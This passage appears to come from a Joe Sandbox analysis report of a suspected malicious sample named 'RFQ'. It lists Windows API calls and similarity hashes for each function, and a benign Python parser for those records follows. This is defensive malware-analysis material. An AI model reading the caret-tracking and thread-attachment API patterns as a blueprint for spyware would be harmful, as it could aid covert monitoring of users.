                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$__itow
                                                                          • String ID:
                                                                          • API String ID: 3379773720-0
                                                                          • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                          • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                          • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                          • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                          • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientMoveRectScreen
                                                                          • String ID:
                                                                          • API String ID: 3880355969-0
                                                                          • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                          • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                          • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                          • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                          • String ID:
                                                                          • API String ID: 2782032738-0
                                                                          • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                          • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                          • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                          • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                          APIs
                                                                          • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                          • GetWindowRect.USER32(?,?), ref: 00441722
                                                                          • PtInRect.USER32(?,?,?), ref: 00441734
                                                                          • MessageBeep.USER32(00000000), ref: 004417AD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1352109105-0
                                                                          • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                          • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                          • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                          • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                          APIs
                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                          • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 3321077145-0
                                                                          • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                          • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                          • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                          • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                          • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                          • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                          • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                          • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 004503C8
                                                                          • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                          • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                          • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Proc$Parent
                                                                          • String ID:
                                                                          • API String ID: 2351499541-0
                                                                          • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                          • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                          • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                          • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                          • TranslateMessage.USER32(?), ref: 00442B01
                                                                          • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Peek$DispatchTranslate
                                                                          • String ID:
                                                                          • API String ID: 1795658109-0
                                                                          • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                          • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                          • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                          • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                          • GetCaretPos.USER32(?), ref: 004743B2
                                                                          • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                          • GetForegroundWindow.USER32 ref: 004743EE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                          • String ID:
                                                                          • API String ID: 2759813231-0
                                                                          • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                          • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                          • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                          • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                          APIs
                                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                          • _wcslen.LIBCMT ref: 00449519
                                                                          • _wcslen.LIBCMT ref: 00449526
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend_wcslen$_wcspbrk
                                                                          • String ID:
                                                                          • API String ID: 2886238975-0
                                                                          • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                          • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                          • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                          • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __setmode$DebugOutputString_fprintf
                                                                          • String ID:
                                                                          • API String ID: 1792727568-0
                                                                          • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                          • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                          • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                          • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                          APIs
                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$AttributesLayered
                                                                          • String ID:
                                                                          • API String ID: 2169480361-0
                                                                          • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                          • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                          • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                          • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                          APIs
                                                                            • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                            • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                            • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                          • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                          • String ID: cdecl
                                                                          • API String ID: 3850814276-3896280584
                                                                          • Opcode ID: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                                          • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                          • Opcode Fuzzy Hash: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                                          • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
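The records above all share one fixed field layout: an "APIs" list (with "Part of subcall function" entries for calls made one level down), a memory dump source, the IDA plugin snapshot, and a "Similarity" block carrying API ID, String ID, API String ID and the opcode/instruction hashes. The Python below is an added example, not Joe Sandbox code and not part of this report: it parses that layout into objects so the API ID hash and the set of imported API names can be compared between functions or pivoted against another report. Its input is constructed from two of the records shown above (the hard-link function and the foreground-window/caret function) with the repeated "Associated:" dump lines and some hash fields left out. Reading "API String ID" as an (API ID, String ID) pair is an inference from the records on this page, where the second number is 0 exactly when "String ID" is empty and non-zero only for the record whose String ID is cdecl.

```python
# Added example (not Joe Sandbox code): parse the per-function "APIs" and
# "Similarity" records of a Joe Sandbox report into objects you can pivot on.
# SAMPLE is constructed from two records on the page; the dump/plugin lines
# and some hash fields are left out to keep it short.
import re
from collections import namedtuple
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
• GetLastError.KERNEL32(?,00000000), ref: 0045D26C
• DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
• Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
APIs
• GetForegroundWindow.USER32(?,?,?), ref: 0047439C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• GetCaretPos.USER32(?), ref: 004743B2
• ClientToScreen.USER32(00000000,?), ref: 004743E8
• GetForegroundWindow.USER32 ref: 004743EE
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Name.MODULE(args), ref: ADDR with an optional "Part of subcall function ADDR: " prefix;
# the argument list is absent for some calls (e.g. GetCurrentThreadId.KERNEL32 ref: ...).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>[\w:]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref: (?P<ref>[0-9A-Fa-f]+)$")
ApiCall = namedtuple("ApiCall", "name module args ref subcall_of")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)

    # "API String ID" is two numbers joined by "-"; in the page's records the second
    # is 0 exactly when "String ID" is empty, so the pair is read as (API ID, String ID).
    @property
    def api_id_hash(self) -> int:
        return int(self.similarity["API String ID"].split("-")[0])

    @property
    def string_id_hash(self) -> int:
        return int(self.similarity["API String ID"].split("-")[1])

    def api_names(self, include_subcalls: bool = True) -> set:
        return {c.name for c in self.apis if include_subcalls or c.subcall_of is None}


def parse_api_line(text: str) -> ApiCall:
    m = API_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised API line: {text!r}")
    args = [a for a in (m["args"] or "").split(",") if a]
    sub = int(m["sub"], 16) if m["sub"] else None
    return ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub)


def parse_records(report_text: str) -> list:
    records, current, section = [], None, None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":                      # each "APIs" header opens a record
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is not None and line.startswith("• "):
            body = line[2:]
            if section == "APIs":
                current.apis.append(parse_api_line(body))
            elif section == "Similarity":
                key, _, value = body.partition(":")
                current.similarity[key.strip()] = value.strip()
    return records                                  # dump/plugin/strings lines are skipped


def jaccard(a: FunctionRecord, b: FunctionRecord) -> float:
    """Share of API names two functions have in common (1.0 = identical set)."""
    x, y = a.api_names(), b.api_names()
    return len(x & y) / len(x | y) if (x | y) else 1.0


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.api_id_hash, rec.similarity["API ID"], sorted(rec.api_names()))
```

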